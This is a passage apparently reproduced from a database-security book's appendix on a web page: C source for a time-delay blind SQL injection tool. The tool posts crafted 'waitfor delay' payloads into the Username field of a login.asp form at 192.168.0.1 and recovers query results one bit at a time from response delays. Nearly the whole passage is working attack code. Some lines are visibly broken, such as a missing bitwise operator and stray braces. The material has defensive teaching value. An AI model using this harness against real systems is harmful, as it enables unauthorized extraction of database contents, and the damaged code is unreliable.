Appendix A: Example C Code for a Time-Delay SQL Injection Harness

 int main( int argc, char *argv[] ) {       int i, t;       HANDLE h_thread[32];           memset( out, 0, 1024 * 64 );           if ( argc != 4 )             return syntax();           query = argv[1];       bit_start = atoi( argv[2] );       bit_end = atoi( argv[3] );           for( i = bit_start; i < bit_end; i += 1 )       {             for( t = 0; t < 1; t++ )             {             h_thread[t] = (HANDLE)_beginthread( thread_proc, 0, (void *)(i+t) );             }                 if ( WaitForMultipleObjects( 1, h_thread, TRUE, 30000 ) == WAIT_TIMEOUT )             {                   printf( "Error - timeout waiting for response\n" );                   return 1;             }                 if ( ( out[ i / 8 ] == 0 ) && ( out[ (i / 8) - 1 ] == 0 ) )             {                   printf("Done!\n");                   return 0;             }       }       return 0; }        int create_get_bit_request( char *query, int bit, char *request, int buff_len ) {       char params[ 1024 * 64 ] = "";       char content_length[32] = "";       char tmp[32] = "";       char query_string[1024 * 64] = "";       int i;           // create bit-retriveal query string             safe_strcat( query_string, "'; ", buff_len );       safe_strcat( query_string, query, buff_len );              sprintf( params, " if (ascii(substring(@s, %d, 1)) & ( power(2,  %d))) > 0 waitfor delay '0:0:4'--", (bit / 8)+1, bit % 8 );       safe_strcat( query_string, params, buff_len );              params[0] = 0;           safe_strcat( request, "POST /login.asp HTTP/1.1\r\n", buff_len );        safe_strcat( request, "Content-Type: application/x-www-form-urlencoded\r\n", buff_len );        safe_strcat( request, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Q312461)\r\n", buff_len );        safe_strcat( request, "Host: 192.168.0.1\r\n", buff_len );        safe_strcat( request, "Connection: Close\r\n", buff_len );        safe_strcat( request, "Cache-Control: no-cache\r\n", buff_len );            safe_strcat( params, "submit=Submit&Password=&Username=", 1024 * 64 );                  for( i = 0; i < (int)strlen( query_string ); i++ )       {             sprintf( tmp, "%%%x", query_string[i] );             safe_strcat( params, tmp, 1024 * 64 );       }           sprintf( content_length, "%d", strlen( params ) );           safe_strcat( request, "Content-Length: ", buff_len );       safe_strcat( request, content_length, buff_len );       safe_strcat( request, "\r\n\r\n", buff_len );           safe_strcat( request, params, buff_len );           return 1; }         }     int thread_proc( int bit ) {       char request[ 1024 * 64 ] = "";       int num_zeroes = 0;           request[0] = 0;       create_get_bit_request( query, bit, request, 1024 * 64 );       do_time_web_request( request, bit, out, len );           printf( "String = %s\n", out );           return 0; }     int do_time_web_request( char *request, int bit, char *out_string, int len ) {       char output[ 1024 * 64 ];       int out_len = 1024 * 64;       DWORD start;       int byte = bit / 8;       int bbit = bit % 8;           start = GetTickCount();           memset( output, 0, (1024 * 64) );              Sleep(2000);           WebGet( "192.168.0.1", 80, 0, request, output, &out_len );           if ( ( GetTickCount() - start ) > 4000 )       {             printf( "bit %d\t=1\n", bit );                 // set the bit             if ( byte <= len )                   out_string[byte] = out_string[byte]  (1 << bbit);             else                   printf("error - output string too short" );                 return 1;       }       else       {             printf( "bit %d\t=0\n", bit );                 return 0;       }           return 1; 


Database Hacker's Handbook. Defending Database Servers
The Database Hackers Handbook: Defending Database Servers
ISBN: 0764578014
EAN: 2147483647
Year: 2003
Pages: 156

flylib.com © 2008-2017.
If you may any questions please contact us: flylib@qtcs.net